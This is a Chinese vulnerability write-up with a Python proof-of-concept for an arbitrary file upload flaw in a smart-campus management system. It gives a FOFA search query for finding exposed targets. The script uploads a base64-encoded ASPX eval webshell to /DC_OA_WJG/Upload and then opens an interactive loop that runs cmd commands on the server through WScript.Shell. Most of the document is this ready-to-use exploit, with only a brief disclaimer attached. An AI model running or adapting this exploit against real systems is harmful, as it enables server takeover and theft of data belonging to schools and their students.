一:漏洞描述🐑
智慧校园管理系统前台注册页面存在文件上传,由于没有对上传的文件进行审查导致可上传恶意文件控制服务器
二: 漏洞影响🐇
智慧校园管理系统
三: 漏洞复现🐋
FOFA语句: body="DC_Login/QYSignUp"
登录页面如下,只要存在企业用户注册就可能出现漏洞,
注意下部分页面没有注册点击位置,但是存在 /DC_OA_WJG/Upload 上传接口
这个地方的上传附件允许了任意文件上传,包括 aspx木马,上传后还会返回 webshell地址
上传的是冰蝎木马,直接连接
四: 漏洞POC🦉
import requests
import sys
import random
import re
import base64
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m')
print('+ 33[34mGithub : https://github.com/PeiQi0 33[0m')
print('+ 33[34m公众号 : PeiQi文库 33[0m')
print('+ 33[34mVersion: 智慧校园管理系统 33[0m')
print('+ 33[36m使用格式: python3 poc.py 33[0m')
print('+ 33[36mUrl >>> http://xxx.xxx.xxx.xxx 33[0m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/DC_OA_WJG/Upload"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryNxqOHxbHqt9mf7s5",
}
data = base64.b64decode("LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5TnhxT0h4YkhxdDltZjdzNQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVwRmlsZSI7IGZpbGVuYW1lPSJQZWlRaS5hc3B4IgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQoKPHNjcmlwdCBsYW5ndWFnZT0iSlNjcmlwdCIgcnVuYXQ9InNlcnZlciI+ZnVuY3Rpb24gUGFnZV9Mb2FkKCl7ZXZhbChSZXF1ZXN0WyJQZWlRaSJdLCJ1bnNhZmUiKTt9PC9zY3JpcHQ+CgotLS0tLS1XZWJLaXRGb3JtQm91bmRhcnlOeHFPSHhiSHF0OW1mN3M1LS0=")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print(" 33[36m[o] 正在请求 {}/DC_OA_WJG/Upload 尝试上传木马..... 33[0m".format(target_url))
if 'true' in response.text and 'path' in response.text and response.status_code == 200:
print(" 33[32m[o] 目标 {} 成功上传 Webshell文件 33[0m".format(target_url))
webshell_path = re.findall(r'"path":"(.*?)"', response.text)[0]
print(" 33[32m[o] Webshell文件地址: {}/{} 33[0m".format(target_url, webshell_path))
while True:
Cmd = str(input(" 33[35mCmd >>> 33[0m"))
cmd_url = target_url + "/" + webshell_path + "?PeiQi=Response.Write(new%20ActiveXObject(%22WSCRIPT.Shell%22).exec(%22cmd%20/c%20{}%22).StdOut.ReadAll());".format(Cmd)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=cmd_url, data=data, headers=headers, verify=False, timeout=5)
print(" 33[32m[o] 响应为:n{} 33[0m".format(response.text))
else:
print(" 33[31m[x] 目标 {} 上传Webshell文件失败 33[0m".format(target_url))
sys.exit(0)
except Exception as e:
print(" 33[31m[x] 请求失败 33[0m", e)
if __name__ == '__main__':
title()
target_url = str(input(" 33[35mPlease input Attack UrlnUrl >>> 33[0m"))
POC_1(target_url)
最后
下面就是文库的公众号啦,更新的文章和重大的漏洞都会在第一时间推送在公众号和交流群中,想要加入交流群的师傅加我好友拉你啦~
别忘了Github下载完给个小星星⭐
https://github.com/PeiQi0/PeiQi-WIKI-POC
本文始发于微信公众号(PeiQi文库):智慧校园管理系统 前台任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论